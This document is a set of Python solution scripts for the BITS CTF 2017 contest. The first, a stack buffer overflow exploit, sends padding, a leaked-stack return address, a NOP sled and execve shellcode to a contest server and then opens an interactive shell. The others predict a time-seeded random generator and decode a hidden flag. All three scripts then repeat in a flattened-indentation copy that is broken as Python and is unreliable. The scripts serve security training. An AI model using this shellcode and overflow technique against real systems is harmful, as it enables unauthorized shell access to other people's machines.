BITS CTF 2017

## cmdline_exploit.py
#! /usr/bin/env python3


import sys
import struct
from telnetlib import Telnet

def p64(addr):
    return struct.pack('<Q', addr)

def exploit(tn):
    stack = int(tn.read_some()[0:14],16)
    payload  = b'AAAAAAAAAAAAAAAAAAAAAAAA'
    sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
    payload += p64(stack+128)
    payload += b'\x90'*256
    payload += sc

    tn.write(payload)

    tn.interact()


def main(argc, argv):
    if argc != 2:
        print('python {} l|r'.format(argv[0]))
        sys.exit(1)

    if argv[1] == 'r':
        tn = Telnet('bitsctf.bits-quark.org', 1330)
        exploit(tn)
    else:
        tn = Telnet('localhost', 1330)
        exploit(tn)


if __name__ == '__main__':
    main(len(sys.argv), sys.argv)

## randomgame_solve.py
from ctypes import *
from telnetlib import Telnet


def exploit(tn):

    libc = CDLL("libc.so.6")
    time = libc.time()
    libc.srand(time)

    for i in range(0, 30):
        tn.read_until(b'round : ')
        val = libc.rand() & 15
        tn.write(str(val).encode() + b'\n')


    tn.interact()

def main():
    tn = Telnet('bitsctf.bits-quark.org', 1335)
    exploit(tn)


if __name__ == '__main__':
    main()

## sherlock_solve.py
#! /usr/bin/env python3

import binascii
import sys


def main():
    with open('final.txt', 'r') as f:
        data = f.read()

    table = {}
    string = ''

    for i in range(0, len(data)):
        if data[i].isupper():
            if data[i] in table.keys():
                table[data[i]] += 1
            else:
                table[data[i]] = 1
            string += data[i]

    string = string.replace('ZERO', '0')
    string = string.replace('ONE', '1')

    data = int(string, 2)
    flag = binascii.unhexlify('%x' % data).decode()

    print(flag)


if __name__ == '__main__':
    main()
	#! /usr/bin/env python3


	import sys
	import struct
	from telnetlib import Telnet

	def p64(addr):
	return struct.pack('<Q', addr)

	def exploit(tn):
	stack = int(tn.read_some()[0:14],16)
	payload = b'AAAAAAAAAAAAAAAAAAAAAAAA'
	sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
	payload += p64(stack+128)
	payload += b'\x90'*256
	payload += sc

	tn.write(payload)

	tn.interact()


	def main(argc, argv):
	if argc != 2:
	print('python {} l\|r'.format(argv[0]))
	sys.exit(1)

	if argv[1] == 'r':
	tn = Telnet('bitsctf.bits-quark.org', 1330)
	exploit(tn)
	else:
	tn = Telnet('localhost', 1330)
	exploit(tn)


	if __name__ == '__main__':
	main(len(sys.argv), sys.argv)
	from ctypes import *
	from telnetlib import Telnet


	def exploit(tn):

	libc = CDLL("libc.so.6")
	time = libc.time()
	libc.srand(time)

	for i in range(0, 30):
	tn.read_until(b'round : ')
	val = libc.rand() & 15
	tn.write(str(val).encode() + b'\n')


	tn.interact()

	def main():
	tn = Telnet('bitsctf.bits-quark.org', 1335)
	exploit(tn)



	if __name__ == '__main__':
	main()
	#! /usr/bin/env python3

	import binascii
	import sys


	def main():
	with open('final.txt', 'r') as f:
	data = f.read()

	table = {}
	string = ''

	for i in range(0, len(data)):
	if data[i].isupper():
	if data[i] in table.keys():
	table[data[i]] += 1
	else:
	table[data[i]] = 1
	string += data[i]

	string = string.replace('ZERO', '0')
	string = string.replace('ONE', '1')

	data = int(string, 2)
	flag = binascii.unhexlify('%x' % data).decode()

	print(flag)




	if __name__ == '__main__':
	main()